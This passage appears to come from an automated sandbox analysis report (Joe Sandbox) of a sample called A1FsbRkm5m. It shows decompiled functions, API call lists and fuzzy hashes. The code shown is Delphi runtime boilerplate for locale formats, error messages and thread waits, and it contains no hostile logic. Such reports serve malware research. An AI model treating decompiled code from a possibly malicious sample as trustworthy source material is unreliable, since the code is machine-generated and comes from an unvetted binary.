                                                                                                                                                                                            • Part of subcall function 0040CED0: VirtualQuery.KERNEL32(?,?,0000001C), ref: 0040CEED
                                                                                                                                                                                            • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 0040CF11
                                                                                                                                                                                            • Part of subcall function 0040CED0: GetModuleFileNameA.KERNEL32(00400000,?,00000105), ref: 0040CF2C
                                                                                                                                                                                            • Part of subcall function 0040CED0: LoadStringA.USER32 ref: 0040CFC2
                                                                                                                                                                                          • CharToOemA.USER32 ref: 0040D08F
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0040D0AC
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0040D0B2
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0040D0C7
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F4,0040D11C,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?,00000400), ref: 0040D0CD
                                                                                                                                                                                          • LoadStringA.USER32 ref: 0040D0EF
                                                                                                                                                                                          • MessageBoxA.USER32 ref: 0040D105
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                                                                                          • String ID: LI
                                                                                                                                                                                          • API String ID: 185507032-1163166679
                                                                                                                                                                                          • Opcode ID: 0cc5e3f5dd2de3276e689d3cc33abafff68e0f02bd7e99a4b59129dfe15b580d
                                                                                                                                                                                          • Instruction ID: 7d08aee67cafa4939384a0f732e453422e0e0597bbcbc481209cf698103cc48d
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0cc5e3f5dd2de3276e689d3cc33abafff68e0f02bd7e99a4b59129dfe15b580d
                                                                                                                                                                                          • Instruction Fuzzy Hash: AC119EB2948205BAD200F7A5CC86F8F77ECAB54304F40463BB754E60E2DA78E844876B
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040E2E8 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 72%
                                                                                                                                                                                          			E0040E2E8(void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				char _v64;
				char _v68;
				void* _t104;
				void* _t111;
				void* _t133;
				intOrPtr _t183;
				intOrPtr _t193;
				intOrPtr _t194;

				_t191 = __esi;
				_t190 = __edi;
				_t193 = _t194;
				_t133 = 8;
				do {
					_push(0);
					_push(0);
					_t133 = _t133 - 1;
				} while (_t133 != 0);
				_push(__ebx);
				_push(_t193);
				_push(0x40e5b3);
				_push( *[fs:eax]);
				 *[fs:eax] = _t194;
				E0040E174();
				E0040CA14(__ebx, __edi, __esi);
				_t196 =  *0x49e750;
				if( *0x49e750 != 0) {
					E0040CBEC(__esi, _t196);
				}
				_t132 = GetThreadLocale();
				E0040C964(_t43, 0, 0x14,  &_v20);
				E00404A14(0x49e684, _v20);
				E0040C964(_t43, 0x40e5c8, 0x1b,  &_v24);
				 *0x49e688 = E00409664(0x40e5c8, 0, _t196);
				E0040C964(_t132, 0x40e5c8, 0x1c,  &_v28);
				 *0x49e689 = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68a = E0040C9B0(_t132, 0x2c, 0xf);
				 *0x49e68b = E0040C9B0(_t132, 0x2e, 0xe);
				E0040C964(_t132, 0x40e5c8, 0x19,  &_v32);
				 *0x49e68c = E00409664(0x40e5c8, 0, _t196);
				 *0x49e68d = E0040C9B0(_t132, 0x2f, 0x1d);
				E0040C964(_t132, "m/d/yy", 0x1f,  &_v40);
				E0040CC9C(_v40, _t132,  &_v36, _t190, _t191, _t196);
				E00404A14(0x49e690, _v36);
				E0040C964(_t132, "mmmm d, yyyy", 0x20,  &_v48);
				E0040CC9C(_v48, _t132,  &_v44, _t190, _t191, _t196);
				E00404A14(0x49e694, _v44);
				 *0x49e698 = E0040C9B0(_t132, 0x3a, 0x1e);
				E0040C964(_t132, 0x40e5fc, 0x28,  &_v52);
				E00404A14(0x49e69c, _v52);
				E0040C964(_t132, 0x40e608, 0x29,  &_v56);
				E00404A14(0x49e6a0, _v56);
				E004049C0( &_v12);
				E004049C0( &_v16);
				E0040C964(_t132, 0x40e5c8, 0x25,  &_v60);
				_t104 = E00409664(0x40e5c8, 0, _t196);
				_t197 = _t104;
				if(_t104 != 0) {
					E00404A58( &_v8, 0x40e620);
				} else {
					E00404A58( &_v8, 0x40e614);
				}
				E0040C964(_t132, 0x40e5c8, 0x23,  &_v64);
				_t111 = E00409664(0x40e5c8, 0, _t197);
				_t198 = _t111;
				if(_t111 == 0) {
					E0040C964(_t132, 0x40e5c8, 0x1005,  &_v68);
					if(E00409664(0x40e5c8, 0, _t198) != 0) {
						E00404A58( &_v12, 0x40e63c);
					} else {
						E00404A58( &_v16, 0x40e62c);
					}
				}
				_push(_v12);
				_push(_v8);
				_push(":mm");
				_push(_v16);
				E00404D40();
				_push(_v12);
				_push(_v8);
				_push(":mm:ss");
				_push(_v16);
				E00404D40();
				 *0x49e752 = E0040C9B0(_t132, 0x2c, 0xc);
				_pop(_t183);
				 *[fs:eax] = _t183;
				_push(E0040E5BA);
				return E004049E4( &_v68, 0x10);
			}

























                                                                                                                                                                                          0x0040e2e8
                                                                                                                                                                                          0x0040e2e8
                                                                                                                                                                                          0x0040e2e9
                                                                                                                                                                                          0x0040e2eb
                                                                                                                                                                                          0x0040e2f0
                                                                                                                                                                                          0x0040e2f0
                                                                                                                                                                                          0x0040e2f2
                                                                                                                                                                                          0x0040e2f4
                                                                                                                                                                                          0x0040e2f4
                                                                                                                                                                                          0x0040e2f7
                                                                                                                                                                                          0x0040e2fa
                                                                                                                                                                                          0x0040e2fb
                                                                                                                                                                                          0x0040e300
                                                                                                                                                                                          0x0040e303
                                                                                                                                                                                          0x0040e306
                                                                                                                                                                                          0x0040e30b
                                                                                                                                                                                          0x0040e310
                                                                                                                                                                                          0x0040e317
                                                                                                                                                                                          0x0040e319
                                                                                                                                                                                          0x0040e319
                                                                                                                                                                                          0x0040e323
                                                                                                                                                                                          0x0040e332
                                                                                                                                                                                          0x0040e33f
                                                                                                                                                                                          0x0040e354
                                                                                                                                                                                          0x0040e363
                                                                                                                                                                                          0x0040e378
                                                                                                                                                                                          0x0040e387
                                                                                                                                                                                          0x0040e39a
                                                                                                                                                                                          0x0040e3ad
                                                                                                                                                                                          0x0040e3c2
                                                                                                                                                                                          0x0040e3d1
                                                                                                                                                                                          0x0040e3e4
                                                                                                                                                                                          0x0040e3f9
                                                                                                                                                                                          0x0040e404
                                                                                                                                                                                          0x0040e411
                                                                                                                                                                                          0x0040e426
                                                                                                                                                                                          0x0040e431
                                                                                                                                                                                          0x0040e43e
                                                                                                                                                                                          0x0040e451
                                                                                                                                                                                          0x0040e466
                                                                                                                                                                                          0x0040e473
                                                                                                                                                                                          0x0040e488
                                                                                                                                                                                          0x0040e495
                                                                                                                                                                                          0x0040e49d
                                                                                                                                                                                          0x0040e4a5
                                                                                                                                                                                          0x0040e4ba
                                                                                                                                                                                          0x0040e4c4
                                                                                                                                                                                          0x0040e4c9
                                                                                                                                                                                          0x0040e4cb
                                                                                                                                                                                          0x0040e4e4
                                                                                                                                                                                          0x0040e4cd
                                                                                                                                                                                          0x0040e4d5
                                                                                                                                                                                          0x0040e4d5
                                                                                                                                                                                          0x0040e4f9
                                                                                                                                                                                          0x0040e503
                                                                                                                                                                                          0x0040e508
                                                                                                                                                                                          0x0040e50a
                                                                                                                                                                                          0x0040e51c
                                                                                                                                                                                          0x0040e52d
                                                                                                                                                                                          0x0040e546
                                                                                                                                                                                          0x0040e52f
                                                                                                                                                                                          0x0040e537
                                                                                                                                                                                          0x0040e537
                                                                                                                                                                                          0x0040e52d
                                                                                                                                                                                          0x0040e54b
                                                                                                                                                                                          0x0040e54e
                                                                                                                                                                                          0x0040e551
                                                                                                                                                                                          0x0040e556
                                                                                                                                                                                          0x0040e563
                                                                                                                                                                                          0x0040e568
                                                                                                                                                                                          0x0040e56b
                                                                                                                                                                                          0x0040e56e
                                                                                                                                                                                          0x0040e573
                                                                                                                                                                                          0x0040e580
                                                                                                                                                                                          0x0040e593
                                                                                                                                                                                          0x0040e59a
                                                                                                                                                                                          0x0040e59d
                                                                                                                                                                                          0x0040e5a0
                                                                                                                                                                                          0x0040e5b2

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetThreadLocale.KERNEL32(00000000,0040E5B3,?,?,00000000,00000000), ref: 0040E31E
                                                                                                                                                                                            • Part of subcall function 0040C964: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0040C982
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Locale$InfoThread
                                                                                                                                                                                          • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                                                                                          • API String ID: 4232894706-2493093252
                                                                                                                                                                                          • Opcode ID: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                                                                                                                                                          • Instruction ID: 2ac3dc33e66767ce4b71c968eb597fff0a4fdc25e0501dc74ddfc3eea00af484
                                                                                                                                                                                          • Opcode Fuzzy Hash: c2101bb9a25c2b6082b13e8ba03f8b7970049bd5283101909c9ce5dd909ceafa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 47612FB07002489BDB00EBF6D881A9E76A59B98704F50993BB100BB3C6DA3DDD15971D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00421900 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 73synchronizationthreadCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 44%
                                                                                                                                                                                          			E00421900(char __edx) {
				char _v8;
				void* _v12;
				char _v16;
				void* __ebp;
				long _t11;
				long _t16;
				void* _t29;
				intOrPtr* _t36;
				intOrPtr _t38;
				void* _t42;
				void* _t44;
				intOrPtr _t45;

				_t42 = _t44;
				_t45 = _t44 + 0xfffffff4;
				_v8 = __edx;
				_t11 = GetCurrentThreadId();
				_t36 =  *0x49de40; // 0x49e034
				if(_t11 !=  *_t36) {
					_v12 = CreateEventA(0, 0xffffffff, 0, 0);
					_push(_t42);
					_push(0x421a22);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					_push(0x49e86c);
					L00406FE0();
					_push(_t42);
					_push(0x421a04);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					if(E0049B5C4 == 0) {
						E0049B5C4 = E00403BBC(1);
					}
					_v16 = _v8;
					_t16 = E0049B5C4; // 0x0
					E0041AB10(_t16,  &_v16);
					E00421494();
					if( *0x49b532 != 0) {
						 *0x49b530();
					}
					_push(0x49e86c);
					L004071A0();
					_push(_t42);
					_push(0x4219e5);
					_push( *[fs:eax]);
					 *[fs:eax] = _t45;
					WaitForSingleObject(_v12, 0xffffffff);
					_pop(_t38);
					 *[fs:eax] = _t38;
					_push(E004219EC);
					_push(0x49e86c);
					L00406FE0();
					return 0;
				} else {
					_t29 =  *((intOrPtr*)(_v8 + 8))();
					return _t29;
				}
			}















                                                                                                                                                                                          0x00421901
                                                                                                                                                                                          0x00421903
                                                                                                                                                                                          0x00421907
                                                                                                                                                                                          0x0042190a
                                                                                                                                                                                          0x0042190f
                                                                                                                                                                                          0x00421917
                                                                                                                                                                                          0x00421934
                                                                                                                                                                                          0x00421939
                                                                                                                                                                                          0x0042193a
                                                                                                                                                                                          0x0042193f
                                                                                                                                                                                          0x00421942
                                                                                                                                                                                          0x00421945
                                                                                                                                                                                          0x0042194a
                                                                                                                                                                                          0x00421951
                                                                                                                                                                                          0x00421952
                                                                                                                                                                                          0x00421957
                                                                                                                                                                                          0x0042195a
                                                                                                                                                                                          0x00421964
                                                                                                                                                                                          0x00421972
                                                                                                                                                                                          0x00421972
                                                                                                                                                                                          0x0042197a
                                                                                                                                                                                          0x00421980
                                                                                                                                                                                          0x00421985
                                                                                                                                                                                          0x0042198a
                                                                                                                                                                                          0x00421997
                                                                                                                                                                                          0x004219a4
                                                                                                                                                                                          0x004219a4
                                                                                                                                                                                          0x004219aa
                                                                                                                                                                                          0x004219af
                                                                                                                                                                                          0x004219b6
                                                                                                                                                                                          0x004219b7
                                                                                                                                                                                          0x004219bc
                                                                                                                                                                                          0x004219bf
                                                                                                                                                                                          0x004219c8
                                                                                                                                                                                          0x004219cf
                                                                                                                                                                                          0x004219d2
                                                                                                                                                                                          0x004219d5
                                                                                                                                                                                          0x004219da
                                                                                                                                                                                          0x004219df
                                                                                                                                                                                          0x004219e4
                                                                                                                                                                                          0x00421919
                                                                                                                                                                                          0x0042191f
                                                                                                                                                                                          0x00421a3e
                                                                                                                                                                                          0x00421a3e

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0042190A
                                                                                                                                                                                          • CreateEventA.KERNEL32(00000000,000000FF,00000000,00000000), ref: 0042192F
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 0042194A
                                                                                                                                                                                          • RtlLeaveCriticalSection.KERNEL32(0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 004219AF
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,004219E5,?,0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000), ref: 004219C8
                                                                                                                                                                                          • RtlEnterCriticalSection.KERNEL32(0049E86C,004219EC,004219E5,?,0049E86C,00000000,00421A04,?,0049E86C,00000000,00421A22,?,00000000,000000FF,00000000,00000000), ref: 004219DF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CriticalSection$Enter$CreateCurrentEventLeaveObjectSingleThreadWait
                                                                                                                                                                                          • String ID: 4I
                                                                                                                                                                                          • API String ID: 1504017990-2364942553
                                                                                                                                                                                          • Opcode ID: 3665c0998e4d21c3542544981b3edf48eb8bee6e47839a5fdd38cf2872efae14
                                                                                                                                                                                          • Instruction ID: c735307bb3b187497a5fd69113a8ab7abc351a98bda77d86b61d484baaaa887a
                                                                                                                                                                                          • Opcode Fuzzy Hash: 3665c0998e4d21c3542544981b3edf48eb8bee6e47839a5fdd38cf2872efae14
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9C21B230A00204AFCB01EF55ED92E597BB4EB19728FA145BBF400977E0DB796C10CA59
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 004047C0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E004047C0(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x49e04c == 0) {
					if( *0x49b034 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x49e220 == 0xd7b2 &&  *0x49e228 > 0) {
						 *0x49e238();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E00404848, 2,  &_v4, 0);
				}
			}





                                                                                                                                                                                          0x004047c8
                                                                                                                                                                                          0x00404828
                                                                                                                                                                                          0x00404838
                                                                                                                                                                                          0x00404838
                                                                                                                                                                                          0x0040483e
                                                                                                                                                                                          0x004047ca
                                                                                                                                                                                          0x004047d3
                                                                                                                                                                                          0x004047e3
                                                                                                                                                                                          0x004047e3
                                                                                                                                                                                          0x004047ff
                                                                                                                                                                                          0x00404820
                                                                                                                                                                                          0x00404820

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics,00000000), ref: 004047F9
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E,?,?,?,00000002,0040492E,0040286B,004028B3,Synaptics), ref: 004047FF
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 00404814
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,00404848,00000002,0049ABAD,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0049ABAD,00000000,?,0040488E), ref: 0040481A
                                                                                                                                                                                          • MessageBoxA.USER32 ref: 00404838
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                                          • Opcode ID: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                          • Instruction ID: d031fbb1000275bb1cbc2334fc3dd0bc9fcf369acb127de660da951a48ee9705
                                                                                                                                                                                          • Opcode Fuzzy Hash: 1dcbe707f156ef72c6b32e8e434cf4761e4d92a63b110f457c2787cb3198cc4d
                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F096D564038075FE20B3626E07F5B255C8794B19F244ABFB320B50E297BC54C0865D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00421A98 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 59threadsynchronizationwindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 94%
                                                                                                                                                                                          			E00421A98(void* __eax, void* __edi, void* __ebp) {
				struct tagMSG _v36;
				long _v40;
				void* _v44;
				void* __ebx;
				void* __esi;
				long _t12;
				long _t20;
				long _t29;
				signed int _t30;
				void* _t32;
				void* _t33;
				DWORD* _t35;

				_t32 = __edi;
				_t35 =  &_v40;
				_t33 = __eax;
				_v44 =  *((intOrPtr*)(__eax + 4));
				_t12 = GetCurrentThreadId();
				_t30 =  *0x49de40; // 0x49e034
				if(_t12 !=  *_t30) {
					WaitForSingleObject(_v44, 0xffffffff);
				} else {
					_t29 = 0;
					_t20 =  *0x49e854; // 0x214
					_v40 = _t20;
					do {
						if(_t29 == 2) {
							PeekMessageA( &_v36, 0, 0, 0, 0);
						}
						_t29 = MsgWaitForMultipleObjects(2,  &_v44, 0, 0x3e8, 0x40);
						_t30 = _t30 & 0xffffff00 | _t29 != 0xffffffff;
						E004218C0(_t33, _t30);
						if(_t29 == 1) {
							E004214B8(0, _t29, _t32, _t33);
						}
					} while (_t29 != 0);
				}
				GetExitCodeThread(_v44, _t35);
				asm("sbb edx, edx");
				E004218C0(_t33, _t30 + 1);
				return  *_t35;
			}















                                                                                                                                                                                          0x00421a98
                                                                                                                                                                                          0x00421a9a
                                                                                                                                                                                          0x00421a9d
                                                                                                                                                                                          0x00421aa2
                                                                                                                                                                                          0x00421aa6
                                                                                                                                                                                          0x00421aab
                                                                                                                                                                                          0x00421ab3
                                                                                                                                                                                          0x00421b14
                                                                                                                                                                                          0x00421ab5
                                                                                                                                                                                          0x00421ab5
                                                                                                                                                                                          0x00421ab7
                                                                                                                                                                                          0x00421abc
                                                                                                                                                                                          0x00421ac0
                                                                                                                                                                                          0x00421ac3
                                                                                                                                                                                          0x00421ad2
                                                                                                                                                                                          0x00421ad2
                                                                                                                                                                                          0x00421aec
                                                                                                                                                                                          0x00421af1
                                                                                                                                                                                          0x00421af6
                                                                                                                                                                                          0x00421afe
                                                                                                                                                                                          0x00421b02
                                                                                                                                                                                          0x00421b02
                                                                                                                                                                                          0x00421b07
                                                                                                                                                                                          0x00421b0b
                                                                                                                                                                                          0x00421b1f
                                                                                                                                                                                          0x00421b27
                                                                                                                                                                                          0x00421b2c
                                                                                                                                                                                          0x00421b39

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00421AA6
                                                                                                                                                                                          • PeekMessageA.USER32(?,00000000,00000000,00000000,00000000), ref: 00421AD2
                                                                                                                                                                                          • MsgWaitForMultipleObjects.USER32 ref: 00421AE7
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00421B14
                                                                                                                                                                                          • GetExitCodeThread.KERNEL32(?,?,?,000000FF), ref: 00421B1F
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.281399107.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.281394755.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281471508.000000000049B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281478978.00000000004A5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281905058.00000000007DB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.281915089.00000000007ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_A1FsbRkm5m.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: ThreadWait$CodeCurrentExitMessageMultipleObjectObjectsPeekSingle
                                                                                                                                                                                          • String ID: 4I
                                                                                                                                                                                          • API String ID: 1797888035-2364942553
                                                                                                                                                                                          • Opcode ID: 8832365ce81f987a54d9d8d135b222cd843b614b1ec257261aef33ca16425cca
                                                                                                                                                                                          • Instruction ID: 91e307cc55c87a5a0c16dfebb803382d4aeb1f0bf0ecfaa787b9004bec19efa9
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8832365ce81f987a54d9d8d135b222cd843b614b1ec257261aef33ca16425cca
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7A11E130B043202BC610FAB99CC6F5E73D8AF65754F508A2AF254E72E1E679E804835A
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410B94 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 77%
                                                                                                                                                                                          			E00410B94(short* __eax, intOrPtr __ecx, intOrPtr* __edx) {
				char _v260;
				char _v768;
				char _v772;
				short* _v776;
				intOrPtr _v780;
				char _v784;
				signed int _v788;
				signed short* _v792;
				char _v796;
				char _v800;
				intOrPtr* _v804;
				void* __ebp;
				signed char _t47;
				signed int _t54;
				void* _t62;
				intOrPtr* _t73;
				intOrPtr* _t91;
				void* _t93;
				void* _t95;
				void* _t98;
				void* _t99;
				intOrPtr* _t108;
				void* _t112;
				intOrPtr _t113;
				char* _t114;
				void* _t115;

				_t100 = __ecx;
				_v780 = __ecx;
				_t91 = __edx;
				_v776 = __eax;
				if(( *(__edx + 1) & 0x00000020) == 0) {
					E00410638(0x80070057);
				}
				_t47 =  *_t91;
				if((_t47 & 0x00000fff) != 0xc) {
					_push(_t91);
					_push(_v776);
					L0040F328();
					return E00410638(_v776);
				} else {
					if((_t47 & 0x00000040) == 0) {
						_v792 =  *((intOrPtr*)(_t91 + 8));
					} else {
						_v792 =  *((intOrPtr*)( *((intOrPtr*)(_t91 + 8))));
					}
					_v788 =  *_v792 & 0x0000ffff;
					_t93 = _v788 - 1;
					if(_t93 < 0) {
						L9:
						_push( &_v772);
						_t54 = _v788;
						_push(_t54);
						_push(0xc);
						L0040F784();
						_t113 = _t54;
						if(_t113 == 0) {
							E00410390(_t100);
						}
						E004109E8(_v776);
						 *_v776 = 0x200c;
						 *((intOrPtr*)(_v776 + 8)) = _t113;
						_t95 = _v788 - 1;
						if(_t95 < 0) {
							L14:
							_t97 = _v788 - 1;
							if(E00410B08(_v788 - 1, _t115) != 0) {
								L0040F79C();
								E00410638(_v792);
								L0040F79C();
								E00410638( &_v260);
								_v780(_t113,  &_v260,  &_v800, _v792,  &_v260,  &_v796);
							}
							_t62 = E00410B38(_t97, _t115);
						} else {
							_t98 = _t95 + 1;
							_t73 =  &_v768;
							_t108 =  &_v260;
							do {
								 *_t108 =  *_t73;
								_t108 = _t108 + 4;
								_t73 = _t73 + 8;
								_t98 = _t98 - 1;
							} while (_t98 != 0);
							do {
								goto L14;
							} while (_t62 != 0);
							return _t62;
						}
					} else {
						_t99 = _t93 + 1;
						_t112 = 0;
						_t114 =  &_v772;
						do {
							_v804 = _t114;
							_push(_v804 + 4);
							_t18 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F78C();
							E00410638(_v792);
							_push( &_v784);
							_t21 = _t112 + 1; // 0x1
							_push(_v792);
							L0040F794();
							E00410638(_v792);
